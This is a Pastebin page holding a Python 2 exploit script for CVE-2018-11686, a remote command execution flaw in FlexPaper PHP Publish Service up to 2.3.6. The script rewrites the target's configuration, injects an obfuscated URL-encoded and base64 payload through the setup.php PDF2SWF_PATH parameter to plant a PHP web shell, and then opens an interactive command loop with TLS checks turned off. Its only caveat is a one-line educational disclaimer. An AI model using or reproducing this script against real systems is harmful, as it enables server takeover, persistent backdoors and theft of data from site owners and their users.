SHARE
TWEET

shredpaper exploit -FlexPaper PHP Publish Service <= 2.3.6

a guest Mar 11th, 2019 515 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
  3. #Date: March 2019
  4. #Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
  5. #Vendor Homepage: https://flowpaper.com/download/
  6. #Version: <= 2.3.6
  7. #Tested on: Linux/Unix
  8. #CVE : CVE-2018-11686
  9. #Disclamer: This exploit is for educational purpose only
  10. #More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/
  11.  
  12. import sys
  13. import requests
  14. import readline
  15. import urllib2
  16. import ssl
  17.  
  18. try:
  19.         url = sys.argv[1]
  20. except:
  21.         print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
  22.         print sys.exit(1)
  23.  
  24. print """
  25.         __                  __                          
  26.   _____/ /_  ________  ____/ ____  ____ _____  ___  _____
  27.  / ___/ __ \/ ___/ _ \/ __  / __ \/ __ `/ __ \/ _ \/ ___/
  28. (__  / / / / /  /  __/ /_/ / /_/ / /_/ / /_/ /  __/ /    
  29. /____/_/ /_/_/   \___/\__,_/ .___/\__,_/ .___/\___/_/    
  30.                          /_/         /_/                
  31. """
  32.  
  33. print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
  34. print "[*] Attacking %s" %url
  35. print "[*] Deleting target configuration file"
  36. payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
  37. url1 = url+"/php/change_config.php"
  38. r1 = requests.post(url1, data=payload)
  39. rx = requests.post(url1, data=payload) #resend
  40. shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"
  41.  
  42. print "[*] Uploading webshell.."
  43. url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode
  44. r2 = requests.get(url2)
  45. print "[*] Checking if shell is uploaded successfully"
  46.  
  47. webshell = url+ '/php/tiger_shell.php'
  48.  
  49. check_shell = requests.get(webshell)
  50. if check_shell.status_code == 200:
  51.         print "[*] We got a shell"
  52. else:
  53.         print "[-] Exploit failed, die"
  54.         sys.exit(2)
  55. ctx = ssl.create_default_context()
  56. ctx.check_hostname = False
  57. ctx.verify_mode = ssl.CERT_NONE
  58. while True:
  59.         cmd = raw_input("enter cmd>>")
  60.         cmd = cmd.strip()
  61.         cmd = cmd.encode('base64').strip().replace("\n","")
  62.         link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
  63.         #print link
  64.         try:
  65.                 response = urllib2.urlopen(link, context=ctx)
  66.                 page = response.read()
  67.                 print page
  68.         except Exception as exc:
  69.                 print exc
  70.                 continue
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top